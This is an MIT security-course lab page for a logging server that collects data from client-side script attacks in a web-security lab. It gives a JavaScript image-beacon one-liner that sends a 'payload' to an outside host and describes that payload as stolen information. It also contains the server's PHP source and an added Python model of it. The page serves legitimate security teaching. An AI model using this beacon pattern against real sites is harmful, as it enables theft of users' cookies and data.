Lab 4 Logging Script

You can use this server-side script to extract data from client-side JavaScript. For example, clicking this client-side hyperlink will cause the server to log the payload:

(new Image()).src='https://css.csail.mit.edu/6.566/2024/labs/log.php?' + 'id=my-username' + '&payload=some-string' + '&random=' + Math.random();

The random argument is ignored by the server, but it ensures that the browser bypasses its cache when downloading the image. We suggest that you use the random argument in your scripts as well. The ID argument will help you distinguish your log entries from those sent by other students; we suggest picking your MIT Athena username. Newlines are not allowed in javascript: links; if this bothers you, try URL encoding (https://meyerweb.com/eric/tools/dencoder/).

Test form

If you just want to try out the script, you can use this form. (For your actual attacks in lab 4, you'll probably want to use the JavaScript image technique shown above.)

Form fields: ID (some identifier to locate your payload in the log) and Payload (the information you stole), followed by a Log button.

Logged entries

Below are the most recent logged entries, so that you can check if your attack worked:


Source code

In case you are curious, here is the source code of this page.

<?php
header("Access-Control-Allow-Origin: *");

do {
    // no usable string id: fall through and render the HTML page below
    if (!array_key_exists("id", $_REQUEST) || !is_string($_REQUEST['id'])) {
        break;
    }

    $id = $_REQUEST['id'];
    if (strlen($id) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "ID value is larger than 1000 bytes";
        return;
    }

    if (!array_key_exists("payload", $_REQUEST) || !is_string($_REQUEST['payload'])) {
        header("HTTP/1.0 400 Bad Request");
        echo "No payload given";
        return;
    }

    $payload = $_REQUEST['payload'];
    // compare against '' rather than using empty(): empty("0") is true in PHP
    if ($payload === '') {
        header("HTTP/1.0 400 Bad Request");
        echo "Empty payload given";
        return;
    }

    if (strlen($payload) > 1000) {
        header("HTTP/1.0 413 Payload Too Large");
        echo "Payload is larger than 1000 bytes";
        return;
    }

    if (!function_exists('apcu_add')) {
        header("HTTP/1.0 501 Not Implemented");
        echo "APCu not enabled, so no rate limiting; refusing all requests";
        return;
    }

    if (apcu_add($payload, true, 5) === false) {
        // exact same $payload was sent in the past 5 seconds
        header("HTTP/1.0 429 Too Many Requests");
        echo "That exact payload was sent very recently; rejecting";
        return;
    }

    $payload = str_replace(array("\n", "\r"), '.', $payload);
    $id = str_replace(array("\n", "\r"), '.', $id);

    $file = fopen("/tmp/6.566-2024-logger.txt", "c+");
    if ($file === false) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to open log file";
        return;
    }

    if (!flock($file, LOCK_EX)) {
        header("HTTP/1.0 503 Service Unavailable");
        echo "Failed to lock log file";
        return;
    }

    // keep at most the 100 most recent prior entries; fgets() returns false
    // once the end of the file is reached, which must not be written back
    $lines = array();
    while (!feof($file) && count($lines) < 100) {
        $line = fgets($file);
        if ($line === false) {
            break;
        }
        $lines[] = $line;
    }
    ftruncate($file, 0);
    rewind($file);
    // newest entry first, followed by the retained older entries
    fwrite($file, date(DATE_RFC2822) . ": " . $id . ": " . $payload . "\n");
    foreach ($lines as $line) {
        fwrite($file, $line);
    }

    flock($file, LOCK_UN);
    fclose($file);

    echo "Logged!";
    return;
} while(0);

$link = "(new Image()).src="
      . "'https://css.csail.mit.edu/6.566/2024/labs/log.php?'"
      . " + 'id=my-username'"
      . " + '&payload=some-string' + '&random='"
      . " + Math.random()";
?><!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" type="text/css" href="labs.css" />
        <title>Lab 4 Logging Script</title>
    </head>
    <body>
        <h1>Lab 4 Logging Script</h1>
        <p>
            You can use this server side script to extract data from
            client-side JavaScript. For example, clicking this client-side
            hyperlink will cause the server to log the payload:
        </p>
        <pre class="tty"><a href="javascript:void(<?=$link;?>)"><?=$link;?>;</a></pre>
        <p>
            The random argument is ignored, but ensures that the browser
            bypasses its cache when downloading the image. We suggest that you
            use the random argument in your scripts as well.  The ID argument
            will help you distinguish your log entries from those sent by other
            students; we suggest picking your MIT Athena username.  Newlines are not
            allowed in <tt>javascript:</tt> links; if this bothers you, try
            <a href="https://meyerweb.com/eric/tools/dencoder/">URL encoding</a>.
        </p>

        <h2>Test form</h2>
        <p>
            If you just want to try out the script, you can use this form.
            (For your actual attacks in lab 4, you'll probably want to use the
            JavaScript image technique shown above.)
        </p>

        <form method="GET" action="">
            <label for="id">ID:</label><br />
            <input id="id" name="id" placeholder="your-mit-username" size="40" />
            <i>(some identifier to locate your payload in the log)</i>
            <br />
            <br />
            <label for="payload">Payload:</label><br />
            <input id="payload" name="payload" placeholder="some-string" size="40" />
            <i>(the information you stole)</i>
            <br />
            <input type="submit" value="Log" name="log_submit" />
        </form>

        <h2>Logged entries</h2>
        <p>
            Below are the most recent logged entries, so that you can check
            if your attack worked:
        </p>

        <pre class="tty"><?php
            $lines = file_get_contents("/tmp/6.566-2024-logger.txt");
            echo htmlspecialchars($lines);
        ?></pre>

        <h2>Source code</h2>
        <p>In case you are curious, here is the source code of this page.</p>
        <pre><?php highlight_file(__FILE__); ?></pre>
    </body>
</html>
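As an added example (not the course's code), here is a Python model of the request handling and log rotation that log.php performs, so you can see what the 1000-byte limits, the 5-second duplicate rejection and the CR/LF replacement do to a request. The dict `recent` stands in for the APCu cache, and `parse_entry` is an assumed helper for reading the resulting log lines back; both are this example's own names.

```python
import re
import time

MAX_LEN = 1000       # same byte limit as the PHP strlen() checks
KEEP_ENTRIES = 100   # the PHP script re-writes at most 100 prior lines
DEDUPE_SECONDS = 5   # apcu_add($payload, true, 5): exact repeat rejected for 5 s
CRLF = re.compile(r"[\r\n]")


def handle_log_request(params, recent, log_lines, now):
    """Models log.php's request path. params: query dict; recent: payload ->
    expiry time (stands in for the APCu cache); log_lines: current file
    content, newest first. Returns (http_status, body, new_log_lines)."""
    pid = params.get("id")
    if not isinstance(pid, str):          # no usable id: PHP renders the page
        return 200, "<html page>", log_lines
    if len(pid.encode()) > MAX_LEN:
        return 413, "ID value is larger than 1000 bytes", log_lines
    payload = params.get("payload")
    if not isinstance(payload, str):
        return 400, "No payload given", log_lines
    if payload == "":
        return 400, "Empty payload given", log_lines
    if len(payload.encode()) > MAX_LEN:
        return 413, "Payload is larger than 1000 bytes", log_lines
    for key in [k for k, exp in recent.items() if exp <= now]:
        del recent[key]                   # expire stale dedupe entries
    if payload in recent:
        return 429, "That exact payload was sent very recently; rejecting", log_lines
    recent[payload] = now + DEDUPE_SECONDS
    # CR/LF become '.', so one request cannot forge extra log lines
    stamp = time.strftime("%a, %d %b %Y %H:%M:%S +0000", time.gmtime(now))
    entry = f"{stamp}: {CRLF.sub('.', pid)}: {CRLF.sub('.', payload)}"
    return 200, "Logged!", [entry] + log_lines[:KEEP_ENTRIES]


def parse_entry(line):
    """Split one log line into (date, id, payload). The id is not escaped,
    so the format is ambiguous if the id itself contains ': '; the first
    ': ' after the date ends the id and the rest is treated as payload."""
    date, rest = line.split(": ", 1)      # RFC 2822 dates contain no ': '
    ident, payload = rest.split(": ", 1)
    return date, ident, payload
```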